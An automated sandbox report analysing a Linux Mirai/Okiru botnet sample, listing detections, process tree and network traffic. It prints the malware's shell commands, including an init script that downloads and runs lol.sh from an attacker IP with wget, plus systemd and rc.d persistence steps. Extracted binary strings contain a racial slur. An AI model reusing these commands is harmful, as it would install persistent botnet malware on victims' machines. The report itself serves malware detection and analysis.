Edit tour

Linux Analysis Report
powerpc.nn.elf

Overview

General Information

Sample name:	powerpc.nn.elf
Analysis ID:	1581262
MD5:	27556d2513e616e4e82a3c0f316bf211
SHA1:	ccf04ec9ee1f0e89f3bf22ef622413cfb234eb07
SHA256:	d16abea205781840fd8919c949b3723df682ea58c0caadfa5f138d4aa1d25f09
Tags:	elfuser-abuse_ch
Infos:

Detection

Okiru

Score:	84
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Okiru

Drops files in suspicious directories

Sample deletes itself

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "rm" command used to delete files or directories

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to set the executable flag

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581262
Start date and time:	2024-12-27 09:13:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	powerpc.nn.elf
Detection:	MAL
Classification:	mal84.spre.troj.evad.linELF@0/10@0/0

Warnings

VT rate limit hit for: http://94.156.227.229/
VT rate limit hit for: http://94.156.227.229/lol.sh
VT rate limit hit for: http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Runtime Messages

Command:	/tmp/powerpc.nn.elf
PID:	6206
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	The Gorilla Botnet Cats Came After You!
Standard Error:

Process Tree

system is lnxubuntu20

dash New Fork (PID: 6186, Parent: 4331)

rm (PID: 6186, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.NYOJJEu7mM /tmp/tmp.D8D2Wtz1Eh /tmp/tmp.qqFC7OmFvK

dash New Fork (PID: 6187, Parent: 4331)

rm (PID: 6187, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.NYOJJEu7mM /tmp/tmp.D8D2Wtz1Eh /tmp/tmp.qqFC7OmFvK

powerpc.nn.elf (PID: 6206, Parent: 6123, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/powerpc.nn.elf

powerpc.nn.elf New Fork (PID: 6222, Parent: 6206)

sh (PID: 6222, Parent: 6206, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 6234, Parent: 6222)

systemctl (PID: 6234, Parent: 6222, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

powerpc.nn.elf New Fork (PID: 6259, Parent: 6206)

sh (PID: 6259, Parent: 6206, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 6261, Parent: 6259)

chmod (PID: 6261, Parent: 6259, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

powerpc.nn.elf New Fork (PID: 6262, Parent: 6206)

sh (PID: 6262, Parent: 6206, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 6266, Parent: 6262)

ln (PID: 6266, Parent: 6262, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

powerpc.nn.elf New Fork (PID: 6267, Parent: 6206)

sh (PID: 6267, Parent: 6206, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/powerpc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting powerpc.nn.elf'\n /tmp/powerpc.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping powerpc.nn.elf'\n killall powerpc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/powerpc.nn.elf"

powerpc.nn.elf New Fork (PID: 6269, Parent: 6206)

sh (PID: 6269, Parent: 6206, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/powerpc.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6271, Parent: 6269)

chmod (PID: 6271, Parent: 6269, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/powerpc.nn.elf

powerpc.nn.elf New Fork (PID: 6272, Parent: 6206)

sh (PID: 6272, Parent: 6206, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 6274, Parent: 6272)

mkdir (PID: 6274, Parent: 6272, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

powerpc.nn.elf New Fork (PID: 6275, Parent: 6206)

sh (PID: 6275, Parent: 6206, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6280, Parent: 6275)

ln (PID: 6280, Parent: 6275, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf

powerpc.nn.elf New Fork (PID: 6281, Parent: 6206)

powerpc.nn.elf New Fork (PID: 6283, Parent: 6281)

powerpc.nn.elf New Fork (PID: 6285, Parent: 6281)

udisksd New Fork (PID: 6217, Parent: 799)

dumpe2fs (PID: 6217, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 6247, Parent: 6246)

snapd-env-generator (PID: 6247, Parent: 6246, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 6296, Parent: 799)

dumpe2fs (PID: 6296, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6347, Parent: 799)

dumpe2fs (PID: 6347, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6348, Parent: 799)

dumpe2fs (PID: 6348, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
powerpc.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
6206.1.00007fcde4001000.00007fcde4017000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: powerpc.nn.elf PID: 6206	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: powerpc.nn.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: powerpc.nn.elf

ReversingLabs: Detection: 26%

Source: powerpc.nn.elf

String: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginnfstftpftpmalloc[start_pid_hopping] Failed to clone: %s

Source: global traffic

TCP traffic: 192.168.2.23:60004 -> 94.156.227.234:38242

Source: /tmp/powerpc.nn.elf (PID: 6206)

Socket: 0.0.0.0:38242

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234

Source: powerpc.nn.elf	String found in binary or memory: http://94.156.227.229/
Source: system.16.dr, inittab.16.dr, powerpc.nn.elf.36.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.dr	String found in binary or memory: http://94.156.227.229/lol.sh
Source: powerpc.nn.elf	String found in binary or memory: http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVR

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal84.spre.troj.evad.linELF@0/10@0/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/powerpc.nn.elf (PID: 6206)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/powerpc.nn.elf (PID: 6206)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 6266)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 6280)	File: /etc/rc.d/S99powerpc.nn.elf -> /etc/init.d/powerpc.nn.elf	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/powerpc.nn.elf (PID: 6206)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6261)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6271)	File: /etc/init.d/powerpc.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6384/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6383/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6034/cmdline	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6364/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6363/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6385/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6366/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6377/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6365/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6376/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6368/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6379/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6367/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6378/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6380/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6382/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6381/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/799/cmdline	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6348/status	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6283)	File opened: /proc/6347/status	Jump to behavior

Source: /tmp/powerpc.nn.elf (PID: 6222)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6259)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6262)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6267)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/powerpc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting powerpc.nn.elf'\n /tmp/powerpc.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping powerpc.nn.elf'\n killall powerpc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/powerpc.nn.elf"	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6269)	Shell command executed: sh -c "chmod +x /etc/init.d/powerpc.nn.elf >/dev/null 2>&1"	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6272)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/powerpc.nn.elf (PID: 6275)	Shell command executed: sh -c "ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 6261)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 6271)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/powerpc.nn.elf			Jump to behavior

Source: /bin/sh (PID: 6274)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /usr/bin/dash (PID: 6186)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.NYOJJEu7mM /tmp/tmp.D8D2Wtz1Eh /tmp/tmp.qqFC7OmFvK			Jump to behavior
Source: /usr/bin/dash (PID: 6187)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.NYOJJEu7mM /tmp/tmp.D8D2Wtz1Eh /tmp/tmp.qqFC7OmFvK			Jump to behavior

Source: /bin/sh (PID: 6234)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/powerpc.nn.elf (PID: 6206)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6261)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6271)	File: /etc/init.d/powerpc.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/powerpc.nn.elf (PID: 6206)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/powerpc.nn.elf (PID: 6206)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 6267)	Writes shell script file to disk with an unusual file extension: /etc/init.d/powerpc.nn.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/powerpc.nn.elf (PID: 6206)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 6267)	File: /etc/init.d/powerpc.nn.elf			Jump to dropped file

Sample deletes itself

Source: /tmp/powerpc.nn.elf (PID: 6285)

File: /tmp/powerpc.nn.elf

Jump to behavior

Source: /tmp/powerpc.nn.elf (PID: 6206)

Queries kernel information via 'uname':

Jump to behavior

Source: powerpc.nn.elf, 6206.1.00007ffd97b8b000.00007ffd97bac000.rw-.sdmp	Binary or memory string: U/tmp/qemu-open.b58Zav\
Source: powerpc.nn.elf, 6206.1.00007ffd97b8b000.00007ffd97bac000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.b58Zav
Source: powerpc.nn.elf, 6206.1.000055f48223b000.000055f4822eb000.rw-.sdmp	Binary or memory string: !/proc/2018/exe0!/usr/bin/vmtoolsd1\
Source: powerpc.nn.elf, 6206.1.000055f48223b000.000055f4822eb000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: powerpc.nn.elf, 6206.1.000055f48223b000.000055f4822eb000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/ppc
Source: powerpc.nn.elf, 6206.1.00007ffd97b8b000.00007ffd97bac000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-ppc
Source: powerpc.nn.elf, 6206.1.00007ffd97b8b000.00007ffd97bac000.rw-.sdmp	Binary or memory string: %s/qemu-op
Source: powerpc.nn.elf, 6206.1.00007ffd97b8b000.00007ffd97bac000.rw-.sdmp	Binary or memory string: 2x86_64/usr/bin/qemu-ppc/tmp/powerpc.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/powerpc.nn.elf
Source: powerpc.nn.elf, 6206.1.000055f48223b000.000055f4822eb000.rw-.sdmp	Binary or memory string: !/etc/qemu-binfmt/ppc1/usr/lib/udisks2/udisksd1/proc/112/exe/ppc/X
Source: powerpc.nn.elf, 6206.1.00007ffd97b8b000.00007ffd97bac000.rw-.sdmp	Binary or memory string: MPDIR%s/qemu-op

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: powerpc.nn.elf, type: SAMPLE
Source: Yara match	File source: 6206.1.00007fcde4001000.00007fcde4017000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powerpc.nn.elf PID: 6206, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: powerpc.nn.elf, type: SAMPLE
Source: Yara match	File source: 6206.1.00007fcde4001000.00007fcde4017000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powerpc.nn.elf PID: 6206, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	11 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Source	Detection	Scanner	Label	Link
powerpc.nn.elf	26%	ReversingLabs	Linux.Backdoor.Mirai
powerpc.nn.elf	100%	Avira	EXP/ELF.Mirai.W

Dropped Files

Source	Detection	Scanner	Label	Link
/etc/rc.local	0%	ReversingLabs

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://94.156.227.229/	0%	Avira URL Cloud	safe
http://94.156.227.229/lol.sh	100%	Avira URL Cloud	malware
http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.156.227.229/	powerpc.nn.elf	false	Avira URL Cloud: safe	unknown
http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	powerpc.nn.elf	false	Avira URL Cloud: safe	unknown
http://94.156.227.229/lol.sh	system.16.dr, inittab.16.dr, powerpc.nn.elf.36.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.dr	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
94.156.227.234	unknown	Bulgaria	57463	NETIXBG	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
94.156.227.234	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm.nn-20241224-0652.elf	Get hash	malicious	Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
91.189.91.43	db0fa4b8db0333367e9bda3ab68b8042.mpsl.elf	Get hash	malicious	Unknown	Browse
	RpcSecurity.arm5.elf	Get hash	malicious	Unknown	Browse
	RpcSecurity.arc.elf	Get hash	malicious	Mirai	Browse
	RpcSecurity.sh4.elf	Get hash	malicious	Unknown	Browse
	db0fa4b8db0333367e9bda3ab68b8042.arm5.elf	Get hash	malicious	Unknown	Browse
	db0fa4b8db0333367e9bda3ab68b8042.ppc.elf	Get hash	malicious	Unknown	Browse
